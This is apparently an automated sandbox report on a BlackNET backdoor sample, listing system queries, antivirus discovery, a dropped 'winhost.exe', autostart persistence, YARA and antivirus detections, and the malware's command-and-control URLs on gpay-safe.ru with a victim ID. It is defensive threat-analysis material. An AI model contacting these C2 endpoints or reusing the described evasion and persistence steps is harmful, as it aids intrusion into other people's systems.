                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                  Source: C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000003.663171745.0000000000FC1000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.675739342.0000000000D26000.00000004.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000003.695758830.0000000000E2B000.00000004.00000001.sdmp, winhost.exe, 00000010.00000002.705628931.0000000001047000.00000004.00000001.sdmp, winhost.exe, 00000013.00000003.714921157.00000000005C7000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                  Stealing of Sensitive Information:

                  barindex
                  Yara detected BlackNETShow sources
                  Source: Yara matchFile source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, type: SAMPLE
                  Source: Yara matchFile source: 19.2.winhost.exe.160000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.0.winhost.exe.160000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.winhost.exe.ae0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.0.winhost.exe.ae0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.winhost.exe.720000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.0.winhost.exe.720000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.674613084.0000000000722000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000000.694369153.0000000000AE2000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.697281898.0000000000812000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.718658230.0000000000162000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.664262498.00000000009B2000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000000.685235797.0000000000812000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.704585116.0000000000AE2000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000000.702548185.0000000000162000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000000.662483550.0000000000722000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.641714732.00000000009B2000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.666828004.0000000002F41000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.709960632.000000000336E000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.722391711.0000000002AD8000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.679744908.0000000002FA0000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.701069218.0000000002FF9000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe PID: 4804, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: winhost.exe PID: 6944, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe PID: 6336, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: winhost.exe PID: 4112, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: winhost.exe PID: 7000, type: MEMORYSTR
                  Source: Yara matchFile source: dropped/winhost.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe, type: DROPPED

                  Remote Access Functionality:

                  barindex
                  Yara detected BlackNETShow sources
                  Source: Yara matchFile source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, type: SAMPLE
                  Source: Yara matchFile source: 19.2.winhost.exe.160000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.0.winhost.exe.160000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.winhost.exe.ae0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.0.winhost.exe.ae0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.winhost.exe.720000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.0.winhost.exe.720000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.674613084.0000000000722000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000000.694369153.0000000000AE2000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.697281898.0000000000812000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.718658230.0000000000162000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.664262498.00000000009B2000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000000.685235797.0000000000812000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.704585116.0000000000AE2000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000000.702548185.0000000000162000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000000.662483550.0000000000722000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.641714732.00000000009B2000.00000002.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.666828004.0000000002F41000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.709960632.000000000336E000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.722391711.0000000002AD8000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.679744908.0000000002FA0000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.701069218.0000000002FF9000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe PID: 4804, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: winhost.exe PID: 6944, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe PID: 6336, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: winhost.exe PID: 4112, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: winhost.exe PID: 7000, type: MEMORYSTR
                  Source: Yara matchFile source: dropped/winhost.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe, type: DROPPED

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid AccountsWindows Management Instrumentation1Registry Run Keys / Startup Folder11Process Injection11Masquerading1Input Capture1Query Registry1Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default AccountsScheduled Task/JobDLL Side-Loading1Registry Run Keys / Startup Folder11Disable or Modify Tools1LSASS MemorySecurity Software Discovery221Remote Desktop ProtocolArchive Collected Data11Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsAt (Linux)Logon Script (Windows)DLL Side-Loading1Virtualization/Sandbox Evasion21Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection11NTDSVirtualization/Sandbox Evasion21Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol113SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsRemote System Discovery11SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information1Cached Domain CredentialsSystem Network Configuration Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing11DCSyncFile and Directory Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobDLL Side-Loading1Proc FilesystemSystem Information Discovery12Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 471063 Sample: 4054EE21CBFC210489F119C2D71... Startdate: 25/08/2021 Architecture: WINDOWS Score: 100 70 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->70 72 Multi AV Scanner detection for domain / URL 2->72 74 Found malware configuration 2->74 76 9 other signatures 2->76 8 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe 15 10 2->8         started        12 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe 1 7 2->12         started        14 winhost.exe 2->14         started        process3 dnsIp4 68 gpay-safe.ru 91.206.93.216, 49724, 49725, 49726 ASBAXETNRU Russian Federation 8->68 54 4054EE21CBFC210489...3129FC0D07A.exe.log, ASCII 8->54 dropped 17 winhost.exe 15 6 8->17         started        21 cmd.exe 1 8->21         started        56 C:\Users\user\AppData\Local\...\winhost.exe, PE32 12->56 dropped 58 C:\Users\user\...\winhost.exe:Zone.Identifier, ASCII 12->58 dropped 23 winhost.exe 12->23         started        25 cmd.exe 12->25         started        90 Creates autostart registry keys with suspicious names 14->90 27 cmd.exe 14->27         started        file5 signatures6 process7 dnsIp8 60 gpay-safe.ru 17->60 62 192.168.2.1 unknown unknown 17->62 78 Antivirus detection for dropped file 17->78 80 Multi AV Scanner detection for dropped file 17->80 82 Machine Learning detection for dropped file 17->82 29 cmd.exe 1 17->29         started        64 1.1.1.1 CLOUDFLARENETUS Australia 21->64 84 Uses ping.exe to sleep 21->84 86 Uses ping.exe to check the status of other devices and networks 21->86 32 conhost.exe 21->32         started        34 PING.EXE 1 21->34         started        66 gpay-safe.ru 23->66 36 cmd.exe 23->36         started        38 conhost.exe 25->38         started        40 PING.EXE 25->40         started        42 conhost.exe 27->42         started        44 PING.EXE 27->44         started        signatures9 process10 signatures11 88 Uses ping.exe to sleep 29->88 46 conhost.exe 29->46         started        48 PING.EXE 1 29->48         started        50 conhost.exe 36->50         started        52 PING.EXE 36->52         started        process12

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe69%VirustotalBrowse
                  4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe56%MetadefenderBrowse
                  4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe85%ReversingLabsByteCode-MSIL.Backdoor.Blacknet
                  4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe100%AviraTR/Dropper.Gen
                  4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe100%AviraTR/Dropper.Gen
                  C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe56%MetadefenderBrowse
                  C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe85%ReversingLabsByteCode-MSIL.Backdoor.Blacknet

                  Unpacked PE Files

                  SourceDetectionScannerLabelLinkDownload
                  0.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack100%AviraHEUR/AGEN.1106066Download File
                  12.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack100%AviraHEUR/AGEN.1106066Download File
                  19.0.winhost.exe.160000.0.unpack100%AviraTR/Dropper.GenDownload File
                  19.2.winhost.exe.160000.0.unpack100%AviraHEUR/AGEN.1106066Download File
                  16.2.winhost.exe.ae0000.0.unpack100%AviraHEUR/AGEN.1106066Download File
                  0.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack100%AviraTR/Dropper.GenDownload File
                  12.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack100%AviraTR/Dropper.GenDownload File
                  16.0.winhost.exe.ae0000.0.unpack100%AviraTR/Dropper.GenDownload File
                  8.0.winhost.exe.720000.0.unpack100%AviraTR/Dropper.GenDownload File
                  8.2.winhost.exe.720000.0.unpack100%AviraHEUR/AGEN.1106066Download File

                  Domains

                  SourceDetectionScannerLabelLink
                  gpay-safe.ru7%VirustotalBrowse

                  URLs

                  SourceDetectionScannerLabelLink
                  http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                  http://www.tiro.com80%Avira URL Cloudsafe
                  http://gpay-safe.ru/x//getCommand.php?id=SGFDa182NUYxRDNBOQx0%Avira URL Cloudsafe
                  http://www.tiro.com0%URL Reputationsafe
                  http://gpay-safe.ru/x//receive.php?command=T25saW5l&vicID=SGFDa182NUYxRDNBOQx0%Avira URL Cloudsafe
                  http://www.goodfont.co.kr0%URL Reputationsafe
                  http://gpay-safe.ru/x//getCommand.php?id=SGFDa182NUYxRDNBOQ0%Avira URL Cloudsafe
                  http://en.w0%URL Reputationsafe
                  http://www.carterandcone.coml0%URL Reputationsafe
                  http://www.sajatypeworks.com0%URL Reputationsafe
                  http://gpay-safe.ru/x/0%Avira URL Cloudsafe
                  http://www.typography.netD0%URL Reputationsafe
                  http://www.ascendercorp.com/typedesigners.htmlx0%Avira URL Cloudsafe
                  http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                  http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                  http://fontfabrik.com0%URL Reputationsafe
                  http://www.founder.com.cn/cn0%URL Reputationsafe
                  http://gpay-safe.ru/x//receive.php?command=T25saW5l&vicID=SGFDa182NUYxRDNBOQ0%Avira URL Cloudsafe
